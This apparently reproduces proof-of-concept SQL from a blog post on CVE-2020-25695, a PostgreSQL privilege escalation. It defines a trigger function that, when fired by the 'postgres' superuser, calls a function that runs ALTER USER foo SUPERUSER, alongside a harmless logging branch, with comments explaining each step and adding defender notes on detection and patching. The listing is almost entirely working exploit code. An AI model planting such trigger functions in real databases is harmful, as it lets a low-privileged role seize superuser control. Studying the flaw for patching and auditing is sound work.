CVE-2020-25695 Privilege Escalation in PostgreSQL - Staaldraad
https://staaldraad.github.io/post/2020-12-15-cve-2020-25695-postgresql-privesc/
https://staaldraad.github.io/post/2020-12-15-cve-2020-25695-postgresql-privesc/
Code:
-- Low privileged function
-- Called by strig() whenever the executing role is anything other than
-- 'postgres'. SECURITY INVOKER means the body runs with the privileges of the
-- calling role, not those of the function owner.
-- Body: inserts current_user into tmp.public.t1 (a record of which role
-- actually executed the call), then returns the integer argument unchanged.
CREATE OR REPLACE FUNCTION snfunc(integer) RETURNS integer
LANGUAGE sql
SECURITY INVOKER AS
'INSERT INTO tmp.public.t1 VALUES (current_user); SELECT $1';
-- High privileged function
-- Called by strig() only when current_user is 'postgres'. It is SECURITY
-- INVOKER as well, so ALTER USER ... SUPERUSER succeeds only if the role
-- executing it already has that right; this is the proof-of-impact step for
-- CVE-2020-25695.
-- Body: inserts current_user into tmp.public.t1, grants SUPERUSER to role foo,
-- then returns the integer argument.
-- Defender note: the lasting artifact is a role whose rolsuper flag in
-- pg_roles is unexpectedly true. The durable fix is running a PostgreSQL
-- release that includes the patch for CVE-2020-25695.
CREATE OR REPLACE FUNCTION snfunc2(integer) RETURNS integer
LANGUAGE sql
SECURITY INVOKER AS
'INSERT INTO tmp.public.t1 VALUES (current_user);
ALTER USER foo SUPERUSER;
SELECT $1';
-- updated trigger
-- Trigger function that selects a payload by the role executing it: as
-- 'postgres' it calls snfunc2 (the privileged branch), as any other role it
-- calls snfunc. Both branches return NEW.
-- No SECURITY clause is given, so the PostgreSQL default (SECURITY INVOKER)
-- applies and current_user is the role that fires the trigger.
-- NOTE(review): 'postgres' is presumably the superuser in the author's test
-- setup; the CREATE TRIGGER statement that attaches this function is not
-- shown in this listing.
-- Defender note: a function owned by an unprivileged role that behaves
-- differently only when current_user is a superuser is a strong review
-- signal when auditing user-created triggers and functions.
CREATE OR REPLACE FUNCTION strig() RETURNS trigger
AS $e$
BEGIN
IF current_user = 'postgres' THEN
PERFORM tmp.public.snfunc2(1000); RETURN NEW;
ELSE
PERFORM tmp.public.snfunc(1000); RETURN NEW;
END IF;
END $e$
LANGUAGE plpgsql;